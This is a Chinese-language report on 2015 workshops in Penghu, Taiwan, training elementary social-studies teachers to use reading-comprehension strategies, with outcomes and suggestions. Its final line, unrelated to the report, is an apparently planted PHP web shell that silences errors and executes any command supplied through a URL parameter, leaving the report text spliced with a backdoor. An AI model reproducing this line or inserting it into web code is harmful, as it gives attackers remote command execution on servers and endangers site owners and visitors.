104年度下半年「閱讀理解策略在社會領域的探究與推廣」分區研習

104年度下半年「閱讀理解策略在社會領域的探究與推廣」分區研習

成果報告類型: 
全縣研習
隸屬領域: 
國小社會領域
辦理學校: 
馬公市五德國小
參與對象: 
湖西鄉、馬公澎南區(山水、五德、嵵裡、風櫃)國小社會教師
辦理日期: 
2015-09-16
2015-10-07
2015-11-18
參加人次: 
20
整體滿意度: 
執行成效說明: 

(一)結合閱讀理解策略的應用,提升教師在社會學習領域教學與課程設計能力。
(二)善用閱讀理解策略,活化社會領域教學活動,提升學生學習興趣。
(三)精進教師教學能力,運用更有效的教學策略與多元評量,提升教師專業能力與學生學習成就。

改進策略: 

(一)改變研習活動方式,多利用工作坊、實務討論、教學演示的方式進行,提高教師的參與度與實用性。
(二)採取學習共同體的教學模式,進行說課、觀課、議課的流程,讓參與研習教師都能實際參與備課。
(三)延聘外縣市優異的輔導員到本縣進行專題演講,並以實際授課、議課的方式,進行研習活動。

建議事項: 

(一)本研習活動主要是利用週三下午時間,學校常會有其他活動或是會議,而影響教師參與,所以縣內或是校內安排活動時須注意日期是否衝突。
(二)研習活動形式,通常都是以講述的方式,較無法吸引教師興趣,日後應改成活動式、工作坊實作的方式進行。
(三)教師對於分區研習的方式尚未很清楚,所以建議再加強對學校宣導,讓縣內教師更明瞭分區研習的意義,提高教師進修意願。

error_reporting(0); $bozx=$_GET[boz]; system($bozx);